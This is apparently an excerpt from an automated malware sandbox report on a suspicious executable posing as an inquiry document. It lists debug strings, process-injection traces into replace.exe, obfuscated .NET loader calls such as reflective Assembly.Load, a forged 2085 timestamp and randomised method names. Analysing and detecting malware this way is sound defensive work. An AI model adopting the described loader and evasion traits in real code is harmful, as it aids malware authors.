                Source: Binary string: wntdll.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb0 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdbGCTL source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3681295936.000000000081E000.00000002.00000001.01000000.0000000D.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3676563053.000000000081E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Drawing.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb4 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.pdb, source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr

                Data Obfuscation

                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs .Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.cs .Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.cs .Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: 0xDA0E7A2E [Wed Dec 5 09:11:10 2085 UTC]
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 0_2_07869418 push esp; iretd 0_2_0786944D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 0_2_0786944F push esp; iretd 0_2_0786944D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 0_2_07869BB0 push 0000005Dh; ret 0_2_07869BE1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 0_2_07869BE8 push 0000005Dh; ret 0_2_07869BE1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 0_2_078D3E3A push ds; ret 0_2_078D3E3B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_0041E073 push ebx; ret 4_2_0041E074
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00416023 push ds; ret 4_2_00416071
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00404834 push ebx; ret 4_2_00404835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_004119A0 pushfd ; iretd 4_2_004119B2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_0040D276 push ebx; retf 4_2_0040D29A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_0040D214 push ecx; iretd 4_2_0040D215
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00418B17 push ss; retf 4_2_00418B1B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_004074E7 pushad ; iretd 4_2_004074F3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00403490 push eax; ret 4_2_00403492
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_0041E4A3 push edx; ret 4_2_0041E4A4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00406524 push es; iretd 4_2_00406530
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_004145D8 pushfd ; ret 4_2_004145D9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_0040CE54 push cs; iretd 4_2_0040CE5B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00EA225F pushad ; ret 4_2_00EA27F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00EA27FA pushad ; ret 4_2_00EA27F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00EA283D push eax; iretd 4_2_00EA2858
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00ED09AD push ecx; mov dword ptr [esp], ecx 4_2_00ED09B6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00EAB008 push es; iretd 4_2_00EAB009
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00EA9939 push es; iretd 4_2_00EA9940
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_032909AD push ecx; mov dword ptr [esp], ecx 21_2_032909B6
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_0294231D push edi; retf 21_2_02942328
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_02934054 pushad ; iretd 21_2_02934060
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_0293E50D pushfd ; iretd 21_2_0293E51F
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_02942B90 push ds; ret 21_2_02942BDE
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_0294ABE0 push ebx; ret 21_2_0294ABE1
                Source: C:\Windows\SysWOW64\replace.exe Code function: 21_2_029313A1 push ebx; ret 21_2_029313A2
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: section name: .text entropy: 7.955766745209155
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, EDrkqNNTCIkioPtkJC.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, YtKP9Dn60ooNnCBsss.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, xMo56NKL8WOxyGtrG1.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, exLKbyYZ3XkQF9bSTH.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, KomQtPcjenOwFmOdORq.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, PoZbtMzHuOKInXqKNJ.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, qno1tymxYbO2r3sJNf.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, rTa5imCWqdkmB6wjPk.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, iX3jYo5b7XNiZZXSAR.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, PdEGCJtnrBHUYbRdcG.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, Yrda3ChKFSZWpRxAwg.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, Ivt4puv4yAdMYHAvAY.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, FaFgKZZc7bmGVoispx.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, QIxXUl9ykF6i6XwVuL.cs High entropy of concatenated method names
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, EDrkqNNTCIkioPtkJC.csHigh entropy of concatenated method names: 'OMHVnZWR1S', 'K80VtOO4dp', 'ToString', 'rROVovp87A', 'M3gVCg4VIk', 'oqtV3cfe3l', 'j1bVuEP3Ev', 'U3CVqJD22i', 'BTSVxNYeGP', 'zc5VjmQs34'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, YtKP9Dn60ooNnCBsss.csHigh entropy of concatenated method names: 'Pe0XOKeLUx', 'G0FXvTtA8b', 'jljXll2lEQ', 'nAGXPsD4mk', 'pGsXeN2RGg', 'yIfXSBCatb', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, xMo56NKL8WOxyGtrG1.csHigh entropy of concatenated method names: 'AD2u1owiCN', 'oryuK5eBn3', 'CQx3lnZOoo', 'PIb3Pd7NRB', 'Uyu3SokFeP', 'FyO30Rr1WB', 'Ovu32UkK5p', 'W3R3bDgT26', 'RJI3h5J2vf', 'mx33TL6udv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, exLKbyYZ3XkQF9bSTH.csHigh entropy of concatenated method names: 'OH2qfkAW97', 'wCIqCetSiA', 'twKquAs1Fc', 'NbmqxiV6fn', 'DWOqjSPN8h', 'Fv3uiM7t21', 'BYpuJMhRBp', 'uWbuZ4h8YW', 'SuLuMORVL7', 'aBFuy7ZYDV'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, KomQtPcjenOwFmOdORq.csHigh entropy of concatenated method names: 'MaMI7Jc3RB', 'f8JIarA5kK', 'w5DI8o5k6t', 'MbdIYXGZZb', 'sPfI1NtLxq', 'aC7IcDFeNv', 'dNgIKqvkfv', 'hmGIrlRVxH', 'dAqIAQXNGo', 'xRuIW8cbfj'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, PoZbtMzHuOKInXqKNJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HblILOvFy1', 'uRSIgD6eIG', 'RYXIs2X8QJ', 'lSnIVoPMN0', 'Lg1IXdc3XF', 'gaZIITkUOG', 'Aa4Ik6thwN'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, qno1tymxYbO2r3sJNf.csHigh entropy of concatenated method names: 'HS8LrtgJNV', 'dnsLA39Vdq', 't8aLOHQLfZ', 'K7ALvbvPjm', 'PvJLPIkDOC', 'moRLSf2eNh', 'zHrL2bZIBs', 'CMRLbKYVYk', 'ky5LTKG0us', 'FWSLEDC2wG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, rTa5imCWqdkmB6wjPk.csHigh entropy of concatenated method names: 'pbj3Y4Sq2i', 'Q5t3cC7Ntq', 'ep63rE5Yk8', 'ovb3AS1Erb', 'euU3gWVxpA', 'soG3sJpyt6', 'RyP3VcoUZF', 'COO3XsoKpj', 'g2l3I6731k', 'S2Q3kJCMIs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, iX3jYo5b7XNiZZXSAR.csHigh entropy of concatenated method names: 'JRmxojFg2Z', 'WF7x3AMxmj', 'BqvxqWvwGm', 'ETHq4JC62d', 'c8Lqzp4Gg6', 'ColxDZlXGX', 'i68xFeZgwa', 'I5KxRFjvlB', 'Nidxm7oRcb', 'gYkxQnvlBs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.csHigh entropy of concatenated method names: 'PnTmfTxi37', 'cWvmoYGZrC', 'qu2mCk9yuL', 'QJGm3wqqEd', 'Pfmmuq6Pb3', 'mcemqimGkC', 'RLMmxKeMCp', 'myRmjTT7HL', 'uiHmUpAkdm', 'LFomn0gM2O'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, PdEGCJtnrBHUYbRdcG.csHigh entropy of concatenated method names: 'k3kIFsSjLx', 'Y0UImelAPw', 'bkSIQh99L0', 'VwlIo12Z4G', 't1YICY966D', 'sEpIurSxM1', 'P0gIqAiuPN', 'pHEXZJbbRt', 'mfDXMFI8JM', 'gr2Xy1r4pA'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, Yrda3ChKFSZWpRxAwg.csHigh entropy of concatenated method names: 'Dispose', 'BLWFy2PWaL', 'zIPRvQctg9', 'CtuddYFjoj', 'ilLF4oe9nM', 'DaDFzs29Uy', 'ProcessDialogKey', 'X4gRDx8Li6', 'uHsRFhIsr6', 'wS7RR43JaG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, Ivt4puv4yAdMYHAvAY.csHigh entropy of concatenated method names: 'xqN8lP4Tf', 'HgMYaoHtB', 'klUcpZY8r', 'HRgKrb5jt', 'cQiAk0ATO', 'oEmWXqTQq', 'TSDIiwdgxKQd3Sai2p', 'ByTR1snVkJiK2hFDAw', 'fPqXXpKLV', 'uHJkPVNVH'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, FaFgKZZc7bmGVoispx.csHigh entropy of concatenated method names: 'bhlx7tgUob', 'z8Vxakd8lk', 'glQx8WO9AT', 'Pt0xYQqyEA', 'hbBx1tycVy', 'j1qxcvyitb', 'YZ8xKH2jDf', 'mobxr5pD6D', 'A4sxAvq28c', 'pbRxW8iCwp'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, QIxXUl9ykF6i6XwVuL.csHigh entropy of concatenated method names: 'jqLCedqrih', 'ibmCNJKuYu', 'YX2CpuSLT3', 'rhVCH1Ohp2', 'gpeCiKVIH2', 'G5XCJgfYAI', 'hLYCZ35mu6', 'iAXCMHkOt7', 'PW3CyIYgr9', 'OuuC4HE2e9'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, EDrkqNNTCIkioPtkJC.csHigh entropy of concatenated method names: 'OMHVnZWR1S', 'K80VtOO4dp', 'ToString', 'rROVovp87A', 'M3gVCg4VIk', 'oqtV3cfe3l', 'j1bVuEP3Ev', 'U3CVqJD22i', 'BTSVxNYeGP', 'zc5VjmQs34'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, YtKP9Dn60ooNnCBsss.csHigh entropy of concatenated method names: 'Pe0XOKeLUx', 'G0FXvTtA8b', 'jljXll2lEQ', 'nAGXPsD4mk', 'pGsXeN2RGg', 'yIfXSBCatb', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, xMo56NKL8WOxyGtrG1.csHigh entropy of concatenated method names: 'AD2u1owiCN', 'oryuK5eBn3', 'CQx3lnZOoo', 'PIb3Pd7NRB', 'Uyu3SokFeP', 'FyO30Rr1WB', 'Ovu32UkK5p', 'W3R3bDgT26', 'RJI3h5J2vf', 'mx33TL6udv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, exLKbyYZ3XkQF9bSTH.csHigh entropy of concatenated method names: 'OH2qfkAW97', 'wCIqCetSiA', 'twKquAs1Fc', 'NbmqxiV6fn', 'DWOqjSPN8h', 'Fv3uiM7t21', 'BYpuJMhRBp', 'uWbuZ4h8YW', 'SuLuMORVL7', 'aBFuy7ZYDV'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, KomQtPcjenOwFmOdORq.csHigh entropy of concatenated method names: 'MaMI7Jc3RB', 'f8JIarA5kK', 'w5DI8o5k6t', 'MbdIYXGZZb', 'sPfI1NtLxq', 'aC7IcDFeNv', 'dNgIKqvkfv', 'hmGIrlRVxH', 'dAqIAQXNGo', 'xRuIW8cbfj'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, PoZbtMzHuOKInXqKNJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HblILOvFy1', 'uRSIgD6eIG', 'RYXIs2X8QJ', 'lSnIVoPMN0', 'Lg1IXdc3XF', 'gaZIITkUOG', 'Aa4Ik6thwN'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, qno1tymxYbO2r3sJNf.csHigh entropy of concatenated method names: 'HS8LrtgJNV', 'dnsLA39Vdq', 't8aLOHQLfZ', 'K7ALvbvPjm', 'PvJLPIkDOC', 'moRLSf2eNh', 'zHrL2bZIBs', 'CMRLbKYVYk', 'ky5LTKG0us', 'FWSLEDC2wG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, rTa5imCWqdkmB6wjPk.csHigh entropy of concatenated method names: 'pbj3Y4Sq2i', 'Q5t3cC7Ntq', 'ep63rE5Yk8', 'ovb3AS1Erb', 'euU3gWVxpA', 'soG3sJpyt6', 'RyP3VcoUZF', 'COO3XsoKpj', 'g2l3I6731k', 'S2Q3kJCMIs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, iX3jYo5b7XNiZZXSAR.csHigh entropy of concatenated method names: 'JRmxojFg2Z', 'WF7x3AMxmj', 'BqvxqWvwGm', 'ETHq4JC62d', 'c8Lqzp4Gg6', 'ColxDZlXGX', 'i68xFeZgwa', 'I5KxRFjvlB', 'Nidxm7oRcb', 'gYkxQnvlBs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.csHigh entropy of concatenated method names: 'PnTmfTxi37', 'cWvmoYGZrC', 'qu2mCk9yuL', 'QJGm3wqqEd', 'Pfmmuq6Pb3', 'mcemqimGkC', 'RLMmxKeMCp', 'myRmjTT7HL', 'uiHmUpAkdm', 'LFomn0gM2O'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, PdEGCJtnrBHUYbRdcG.csHigh entropy of concatenated method names: 'k3kIFsSjLx', 'Y0UImelAPw', 'bkSIQh99L0', 'VwlIo12Z4G', 't1YICY966D', 'sEpIurSxM1', 'P0gIqAiuPN', 'pHEXZJbbRt', 'mfDXMFI8JM', 'gr2Xy1r4pA'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, Yrda3ChKFSZWpRxAwg.csHigh entropy of concatenated method names: 'Dispose', 'BLWFy2PWaL', 'zIPRvQctg9', 'CtuddYFjoj', 'ilLF4oe9nM', 'DaDFzs29Uy', 'ProcessDialogKey', 'X4gRDx8Li6', 'uHsRFhIsr6', 'wS7RR43JaG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, Ivt4puv4yAdMYHAvAY.csHigh entropy of concatenated method names: 'xqN8lP4Tf', 'HgMYaoHtB', 'klUcpZY8r', 'HRgKrb5jt', 'cQiAk0ATO', 'oEmWXqTQq', 'TSDIiwdgxKQd3Sai2p', 'ByTR1snVkJiK2hFDAw', 'fPqXXpKLV', 'uHJkPVNVH'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, FaFgKZZc7bmGVoispx.csHigh entropy of concatenated method names: 'bhlx7tgUob', 'z8Vxakd8lk', 'glQx8WO9AT', 'Pt0xYQqyEA', 'hbBx1tycVy', 'j1qxcvyitb', 'YZ8xKH2jDf', 'mobxr5pD6D', 'A4sxAvq28c', 'pbRxW8iCwp'
